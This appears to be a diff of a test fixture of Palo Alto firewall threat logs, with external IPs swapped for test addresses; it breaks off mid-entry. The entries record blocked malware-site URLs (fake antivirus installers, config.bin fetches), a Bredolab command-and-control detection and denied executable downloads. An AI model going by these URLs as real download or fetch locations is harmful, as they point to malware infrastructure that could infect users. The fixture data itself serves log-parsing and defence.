04:39:34,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,"nolagtime.com/gwc.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,"findnolimits.com/go.php?sid=1",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, Oct 30 09:51:33 1,2012/10/30 
09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/moun.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/palast.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,216.8.179.25,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,"www.15min.it/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0, Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,69.43.161.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,"tubemov.com/",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,208.91.196.252,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,"pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0, Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,"movfree.com/",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 
04:36:39,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United 
States,192.168.0.0-192.168.255.255,0, -Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable 
(EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, +Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,89.160.20.112,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 
04:54:33,81.2.69.145,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,"boialex.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 
04:42:42,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,"edw-melon.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,"maximtushin.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,89.160.20.112,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:22 1,2013/03/25 
23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,207.46.140.46,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,"default.aspx",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,81.2.69.143,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 
08:18:32,81.2.69.143,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,65.54.71.11,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,"c.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,89.160.20.156,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 
08:58:18,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
07:16:03,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,1.128.3.4,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,216.160.83.61,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 